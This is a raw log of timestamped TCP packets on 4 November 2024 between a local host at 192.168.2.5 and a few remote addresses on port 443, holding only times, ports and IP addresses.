Nov 4, 2024 17:31:12.070323944 CET	49713	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:12.070369959 CET	443	49713	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:12.448630095 CET	443	49713	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:12.448658943 CET	443	49713	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:12.448761940 CET	49713	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:12.448791027 CET	443	49713	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:12.452867031 CET	49713	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:12.452886105 CET	49713	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:12.453058958 CET	443	49713	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:12.453090906 CET	443	49713	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:12.453149080 CET	49713	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:12.462836981 CET	443	49714	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:12.462930918 CET	49714	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:12.466536045 CET	49714	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:12.466547012 CET	443	49714	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:12.466873884 CET	443	49714	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:12.468333006 CET	49714	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:12.468424082 CET	49714	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:12.468430042 CET	443	49714	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:12.468703032 CET	49714	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:12.479903936 CET	49716	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:12.479950905 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:12.480041027 CET	49716	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:12.480211020 CET	49716	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:12.480225086 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:12.511323929 CET	443	49714	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:12.714026928 CET	443	49714	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:12.716336966 CET	49714	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:12.716355085 CET	443	49714	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:12.716386080 CET	49714	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:12.716407061 CET	49714	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:13.600111008 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:13.600629091 CET	49716	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:13.600660086 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:13.601339102 CET	49716	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:13.601350069 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:13.601412058 CET	49716	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:13.601423979 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:14.149250984 CET	49718	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:14.149291992 CET	443	49718	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:14.149353981 CET	49718	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:14.149899960 CET	49718	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:14.149915934 CET	443	49718	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:14.347979069 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:14.348007917 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:14.348078012 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:14.348097086 CET	49716	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:14.348126888 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:14.348145008 CET	49716	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:14.348397970 CET	49716	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:14.348414898 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:14.348427057 CET	49716	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:14.348557949 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:14.348588943 CET	443	49716	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:14.348625898 CET	49716	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:14.368783951 CET	49719	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:14.368832111 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:14.368897915 CET	49719	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:14.369045019 CET	49719	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:14.369062901 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:15.255590916 CET	443	49718	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:15.255747080 CET	49718	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:15.284086943 CET	49718	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:15.284110069 CET	443	49718	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:15.284472942 CET	443	49718	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:15.286289930 CET	49718	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:15.286670923 CET	49718	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:15.286678076 CET	443	49718	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:15.287753105 CET	49718	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:15.331341982 CET	443	49718	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:15.483475924 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:15.486695051 CET	49719	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:15.486730099 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:15.492307901 CET	49719	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:15.492327929 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:15.492358923 CET	49719	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:15.492367983 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:15.534728050 CET	443	49718	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:15.556516886 CET	49718	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:15.556518078 CET	49718	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:15.556552887 CET	443	49718	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:15.556633949 CET	49718	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:16.189377069 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:16.189404964 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:16.189454079 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:16.189488888 CET	49719	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:16.189532995 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:16.189553976 CET	49719	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:16.194617987 CET	49719	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:16.194653988 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:16.194669962 CET	49719	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:16.194842100 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:16.194875002 CET	443	49719	40.126.32.74	192.168.2.5
Nov 4, 2024 17:31:16.194962025 CET	49719	443	192.168.2.5	40.126.32.74
Nov 4, 2024 17:31:17.782073021 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:17.782109022 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:17.782188892 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:17.782538891 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:17.782550097 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.520375967 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.520467043 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:18.534070015 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:18.534101009 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.534507036 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.583729029 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:18.587013006 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:18.631337881 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.735246897 CET	49721	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:18.735301018 CET	443	49721	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:18.735366106 CET	49721	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:18.736397028 CET	49721	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:18.736411095 CET	443	49721	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:18.846311092 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.846334934 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.846343994 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.846357107 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.846381903 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:18.846415043 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.846430063 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.846440077 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:18.846455097 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:18.846483946 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:18.963463068 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.963486910 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.963525057 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:18.963552952 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:18.963577032 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:18.963592052 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.080476046 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.080499887 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.080559969 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.080590010 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.080629110 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.197465897 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.197494984 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.197547913 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.197582006 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.197597027 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.197623968 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.314354897 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.314380884 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.314506054 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.314548969 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.314595938 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.435092926 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.435121059 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.435262918 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.435278893 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.435328007 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.548593044 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.548619986 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.548715115 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.548743963 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.548779964 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.625509024 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.625538111 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.625705957 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.625735998 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.625895977 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.695436954 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.695465088 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.695583105 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.695616007 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.695662022 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.811902046 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.811930895 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.811988115 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.812014103 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.812038898 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.812071085 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.833651066 CET	49674	443	192.168.2.5	23.1.237.91
Nov 4, 2024 17:31:19.833684921 CET	49675	443	192.168.2.5	23.1.237.91
Nov 4, 2024 17:31:19.856631994 CET	443	49721	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:19.856726885 CET	49721	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:19.858653069 CET	49721	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:19.858661890 CET	443	49721	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:19.858902931 CET	443	49721	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:19.860347033 CET	49721	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:19.860404968 CET	49721	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:19.860409975 CET	443	49721	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:19.860496998 CET	49721	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:19.903335094 CET	443	49721	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:19.929920912 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.929954052 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.930083036 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.930113077 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:19.930155993 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:19.943059921 CET	49673	443	192.168.2.5	23.1.237.91
Nov 4, 2024 17:31:20.017672062 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.017700911 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.017819881 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.017837048 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.017883062 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.093983889 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.094011068 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.094090939 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.094109058 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.094170094 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.105451107 CET	443	49721	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:20.106014967 CET	49721	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:20.106029034 CET	443	49721	40.115.3.253	192.168.2.5
Nov 4, 2024 17:31:20.106055021 CET	49721	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:20.106091022 CET	49721	443	192.168.2.5	40.115.3.253
Nov 4, 2024 17:31:20.134773016 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.134855986 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.134864092 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.134938002 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.135057926 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.135071993 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.135087013 CET	49720	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.135092974 CET	443	49720	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.191325903 CET	49722	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.191356897 CET	443	49722	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.191443920 CET	49723	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.191450119 CET	49722	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.191478014 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.191781998 CET	49724	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.191807032 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.191858053 CET	49724	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.192378044 CET	49723	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.192382097 CET	49725	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.192409039 CET	443	49725	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.192620039 CET	49725	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.192620039 CET	49725	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.192651033 CET	443	49725	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.192703009 CET	49722	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.192713022 CET	443	49722	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.192848921 CET	49723	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.192862034 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.192864895 CET	49724	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.192876101 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.192972898 CET	49726	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.192980051 CET	443	49726	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.193038940 CET	49726	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.193193913 CET	49726	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.193201065 CET	443	49726	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.920327902 CET	443	49722	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.921205044 CET	49722	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.921233892 CET	443	49722	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.921700954 CET	49722	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.921706915 CET	443	49722	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.933032036 CET	443	49725	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.933468103 CET	49725	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.933487892 CET	443	49725	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.933856010 CET	49725	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.933861017 CET	443	49725	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.934674978 CET	443	49726	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.934925079 CET	49726	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.934956074 CET	443	49726	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.935271025 CET	49726	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.935276031 CET	443	49726	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.954071999 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.954606056 CET	49723	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.954636097 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.955085039 CET	49723	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.955091000 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.988562107 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.989128113 CET	49724	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.989156008 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:20.989586115 CET	49724	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:20.989592075 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.065236092 CET	443	49725	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.065265894 CET	443	49725	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.065380096 CET	49725	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.065392971 CET	443	49725	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.065490007 CET	443	49725	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.065537930 CET	49725	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.066262960 CET	49725	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.066288948 CET	443	49725	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.066344976 CET	49725	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.066351891 CET	443	49725	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.069046021 CET	49727	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.069070101 CET	443	49727	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.069149971 CET	49727	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.069330931 CET	49727	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.069341898 CET	443	49727	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.071439028 CET	443	49726	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.071508884 CET	443	49726	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.071566105 CET	49726	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.071656942 CET	49726	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.071674109 CET	443	49726	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.071707964 CET	49726	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.071713924 CET	443	49726	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.073818922 CET	49728	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.073837996 CET	443	49728	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.073901892 CET	49728	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.074045897 CET	49728	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.074053049 CET	443	49728	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.083913088 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.083937883 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.084012032 CET	49723	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.084043980 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.084095955 CET	49723	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.084161043 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.084203005 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.084239006 CET	49723	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.094650984 CET	49723	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.094687939 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.094702959 CET	49723	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.094715118 CET	443	49723	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.097326994 CET	49729	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.097369909 CET	443	49729	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.097460985 CET	49729	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.097589970 CET	49729	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.097603083 CET	443	49729	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.132169962 CET	443	49722	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.132251024 CET	443	49722	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.132313967 CET	49722	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.132508039 CET	49722	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.132533073 CET	443	49722	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.132544994 CET	49722	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.132550955 CET	443	49722	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.133022070 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.133039951 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.133105993 CET	49724	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.133114100 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.133167028 CET	49724	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.133363008 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.133408070 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.133455038 CET	49724	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.133917093 CET	49724	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.133925915 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.133929968 CET	49724	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.133934021 CET	443	49724	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.136471987 CET	49730	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.136522055 CET	443	49730	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.136625051 CET	49730	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.137002945 CET	49730	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.137016058 CET	443	49730	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.137590885 CET	49731	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.137605906 CET	443	49731	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.137675047 CET	49731	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.137779951 CET	49731	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.137790918 CET	443	49731	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.748189926 CET	443	49711	23.1.237.91	192.168.2.5
Nov 4, 2024 17:31:21.748285055 CET	49711	443	192.168.2.5	23.1.237.91
Nov 4, 2024 17:31:21.851669073 CET	443	49728	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.852416992 CET	49728	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:31:21.852447033 CET	443	49728	13.107.246.45	192.168.2.5
Nov 4, 2024 17:31:21.852921009 CET	49728	443	192.168.2.5	13.107.246.45
